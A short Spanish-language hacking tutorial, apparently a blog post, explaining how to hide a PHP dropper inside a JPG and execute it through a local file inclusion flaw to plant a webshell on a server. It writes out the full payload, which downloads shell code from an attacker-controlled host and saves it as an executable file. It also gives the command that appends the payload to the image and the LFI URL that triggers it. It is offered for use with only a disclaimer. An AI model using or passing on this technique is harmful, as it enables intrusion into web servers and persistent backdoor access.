En este Tutoria Explicare como meter una phpshell dentro de un servidor por medio de un jpg, para explotarlo mediante un LFI.
Empesemos:
1) Necesitamos 3 cosas una shell.php (con el contenido de nuestra webshell preferida),
una imagen q llame la atencion yo elegi sexy.jpg y un archivo shell.txt con la siguiente String
<? copy("http://tuservidor.com/shell.txt","nombreshell.php"); chmod("nombreshell.php",0755); ?>
Como vemos en la imagen tenemos una foto muy llamativa y un archivo shell.txt con la siguiente string
<? copy("http://tuservidor.com/shell.txt","nombreshell.php"); chmod("nombreshell.php",0755); ?>
yo lo configure de la siguiente manera porq es un entorno local.
<? copy("http://192.168.1.1/shell.txt","shell.php"); chmod("shell.php",0755); ?>
Esta String esta en php, hace lo siguiente:
Copia el contenido de shell.txt situada en nusetro servidor dentro de shell.php
(lo crea dentro de servidor vulnerable) y le asigna permisos 755
Abrimos nuestro Terminal y nos situamos en la Carpeta donde tenemos la foto sexy.jpg y shell.txt
y tipeamos:
cat shell.txt >> sexy.jpg
Todo Termina Correctamente, y si hacemos un Cat a sexy.jpg podemos ver el Source Incluido en ella
cat sexy.jpg
Abrimos sexy.jpg y vemos q la imagen abre sin ningun problema
Ahora nos resta subir sexy.jpg a un servidor Vulnerable a LFI e incluir la Imagen para q se ejecute su contenido php.
(Asumo que ya tiene acceso a AdminPanel y existe un Upload en "X" servidor con una Vulnerabilidad LFI)
http://WebVulnerable/LFI.php?Parametro=sexy.jpg
veran que un monton de caracteres raros aparecen en el navegador (estos son los caracteres Internos del jpg)
luego simplemente Visitamos nuestra shell con la url correspondiente
http://WebVulnerable/shell.php
Espero que este Tutorial Les sea de Utilidad
PD: Este metodo Funciona en Redes Lan y en Redes Wan, No me hago Responsable del uso que le den.
HD_Breaker
0 comentarios:
Publicar un comentario